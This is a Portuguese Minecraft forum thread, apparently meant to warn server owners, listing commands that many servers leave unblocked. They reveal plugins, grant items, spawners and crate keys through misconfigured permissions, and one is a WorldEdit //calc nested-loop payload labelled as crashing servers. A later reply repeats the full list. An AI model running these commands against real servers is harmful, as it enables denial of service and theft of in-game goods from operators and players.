Ameericano_ Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 (editado) Olá, hoje vim trazer uma lista de comandos que podem prejudicar o seu servidor de diversas formas. São comandos básicos, mas que muitos servidores ainda deixam de bloqueá-los. Espero que gostem! :giggle: Lista: Para ver comandos e plugins dos servidores: / + [TAB] /? /help /ehelp /minecraft:help /bukkit:help /essentials:help Para vender itens: /sell all /esell all /essentials:sell all Para pegar itens: /chestshop:csgive <id do item> <quantidade> <player> (necessita do chestshop) /csgive <id do item> <quantidade> <player> /egive <id do item> <quantidade> <player> /essentials:give <player> <id do item> <quantidade> (necessita do essentials) /give <player> <id do item> <quantidade> /minecraft:give <player> <id do item> Para pegar spawners: (todos necessitam SilkSpawners) /ss give <player> <mob> <quantidade> /silk give <player> <mob> <quantidade> /spawner give <player> <mob> <quantidade> /silkspawners give <player> <mob> <quantidade> /spawnersilk give <player> <mob> <quantidade> /eg give <player> <mob> <quantidade> /egg give <player> <mob> <quantidade> /eggs give <player> <mob> <quantidade> [CASO NÃO FUNCIONE VOCÊ PODE TENTAR DIGITAR /silkspawners: NA FRENTE DESSA MANEIRA: /silkspawners:ss give <player> <mob> <quantidade> Para pegar caixa caixas ou keys: /ac key <player> <tipo da key> <quantidade> /archoncrates key <player> <tipo da key> <quantidade> /archoncrates:ac key <player> <tipo da key> <quantidade> /archoncrates:achoncrates key <player> <tipo da key> <quantidade> /dmistery give <player> <tipo da caixa> <quantidade> /mysteriousboxes:dmistery <player> <tipo da caixa> <quantidade> Para derrubar servidores: (todos necessita WorldEdit) //calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}} //calculate for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}? Observação: Todos os comandos que não coloquei o plugin que necessita, é porque o mesmo já fala qual é preciso. Obrigado por ler! Editado Setembro 7, 2017 por Ameericano_ 4 Link para o comentário Compartilhar em outros sites More sharing options...
v1ctu Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 Boa! Vai ajudar muita gente. 1 Link para o comentário Compartilhar em outros sites More sharing options...
Ameericano_ Postado Setembro 7, 2017 Autor Denunciar Compartilhar Postado Setembro 7, 2017 Boa! Vai ajudar muita gente. Obrigado. Link para o comentário Compartilhar em outros sites More sharing options...
JackIce Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 Legal vlw nem sabia de alguns comandos desses. 1 Link para o comentário Compartilhar em outros sites More sharing options...
Ameericano_ Postado Setembro 7, 2017 Autor Denunciar Compartilhar Postado Setembro 7, 2017 Legal vlw nem sabia de alguns comandos desses. Disponha! Link para o comentário Compartilhar em outros sites More sharing options...
Nuno M. Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 Boa, vai ajudar muitos, sabia todos menos os do ChestShop '-' Isso me deixou bom alerta! 1 Link para o comentário Compartilhar em outros sites More sharing options...
VitorKMG Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 Muito bom !! 1 Link para o comentário Compartilhar em outros sites More sharing options...
Ameericano_ Postado Setembro 7, 2017 Autor Denunciar Compartilhar Postado Setembro 7, 2017 Boa, vai ajudar muitos, sabia todos menos os do ChestShop '-' Isso me deixou bom alerta! Obrigado ^^ Muito bom !! Obrigado :) Link para o comentário Compartilhar em outros sites More sharing options...
yLeonardo Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 (editado) Excelente tópico, vai ajudar muita gente, eu, ja sou mais experientes sei muitos, mas mesmo assim eu descobri de alguns que não sabia por causa desse tópico, obrigado e parabéns pela preocupação, não é qualquer um que pensa nos outros que nem você, rsrs! Editado Setembro 7, 2017 por yLeonardo Link para o comentário Compartilhar em outros sites More sharing options...
Ameericano_ Postado Setembro 7, 2017 Autor Denunciar Compartilhar Postado Setembro 7, 2017 Excelente tópico, vai ajudar muita gente, eu, ja sou mais experientes sei muitos, mas mesmo assim eu descobri de alguns que não sabia por causa desse tópico, obrigado e parabéns pela preocupação, não é qualquer um que pensam nos outros, rsrs! Obrigado. :giggle: Link para o comentário Compartilhar em outros sites More sharing options...
quando eu tinha uma glock Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 alguns eu não fazia ideia de que existia :kk: vlw men Link para o comentário Compartilhar em outros sites More sharing options...
Ameericano_ Postado Setembro 7, 2017 Autor Denunciar Compartilhar Postado Setembro 7, 2017 alguns eu não fazia ideia de que existia :kk: vlw men Sempre a disposição! Link para o comentário Compartilhar em outros sites More sharing options...
yLikedG0D Postado Setembro 7, 2017 Denunciar Compartilhar Postado Setembro 7, 2017 ./bukkit:ver <tab> ./ver <tab> Solução: NoCheatPlus ./pl entre outros recomendo o CommandBlockerUltimate(Acho que o nome é assim). Vai ajudar muitos novatos/pessoas que não sabiam da existência de alguns comandos, rs. Link para o comentário Compartilhar em outros sites More sharing options...
RUSHyoutuber Postado Março 16, 2018 Denunciar Compartilhar Postado Março 16, 2018 Olá, hoje vim trazer uma lista de comandos que podem prejudicar o seu servidor de diversas formas. São comandos básicos, mas que muitos servidores ainda deixam de bloqueá-los. Espero que gostem! :giggle: Lista: Para ver comandos e plugins dos servidores: / + [TAB] /? /help /ehelp /minecraft:help /bukkit:help /essentials:help Para vender itens: /sell all /esell all /essentials:sell all Para pegar itens: /chestshop:csgive <id do item> <quantidade> <player> (necessita do chestshop) /csgive <id do item> <quantidade> <player> /egive <id do item> <quantidade> <player> /essentials:give <player> <id do item> <quantidade> (necessita do essentials) /give <player> <id do item> <quantidade> /minecraft:give <player> <id do item> Para pegar spawners: (todos necessitam SilkSpawners) /ss give <player> <mob> <quantidade> /silk give <player> <mob> <quantidade> /spawner give <player> <mob> <quantidade> /silkspawners give <player> <mob> <quantidade> /spawnersilk give <player> <mob> <quantidade> /eg give <player> <mob> <quantidade> /egg give <player> <mob> <quantidade> /eggs give <player> <mob> <quantidade> [CASO NÃO FUNCIONE VOCÊ PODE TENTAR DIGITAR /silkspawners: NA FRENTE DESSA MANEIRA: /silkspawners:ss give <player> <mob> <quantidade> Para pegar caixa caixas ou keys: /ac key <player> <tipo da key> <quantidade> /archoncrates key <player> <tipo da key> <quantidade> /archoncrates:ac key <player> <tipo da key> <quantidade> /archoncrates:achoncrates key <player> <tipo da key> <quantidade> /dmistery give <player> <tipo da caixa> <quantidade> /mysteriousboxes:dmistery <player> <tipo da caixa> <quantidade> Para derrubar servidores: (todos necessita WorldEdit) //calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}} //calculate for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}? Observação: Todos os comandos que não coloquei o plugin que necessita, é porque o mesmo já fala qual é preciso. Obrigado por ler! seria bom dar os créditos pro criado de vez em quando. Link para o comentário Compartilhar em outros sites More sharing options...
Yes My Friend Postado Março 16, 2018 Denunciar Compartilhar Postado Março 16, 2018 Nossa muito bom, tem uns que achei que nem existissem ;-; Vai ajudar bastante gente. Link para o comentário Compartilhar em outros sites More sharing options...
Sr Adolfo Postado Março 16, 2018 Denunciar Compartilhar Postado Março 16, 2018 Muitos eu não conhecia. Obrigado por disponibiliza-la. Link para o comentário Compartilhar em outros sites More sharing options...
Taczin Postado Agosto 16, 2018 Denunciar Compartilhar Postado Agosto 16, 2018 Me lembro de ver isso em algum lado... Link para o comentário Compartilhar em outros sites More sharing options...
Lightwood Postado Junho 28, 2019 Denunciar Compartilhar Postado Junho 28, 2019 Seu tópico foi marcado como Inativo. Para reverter está ação, entre em contato com a equipe de Moderação. OBS: Essa mensagem é automática. Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados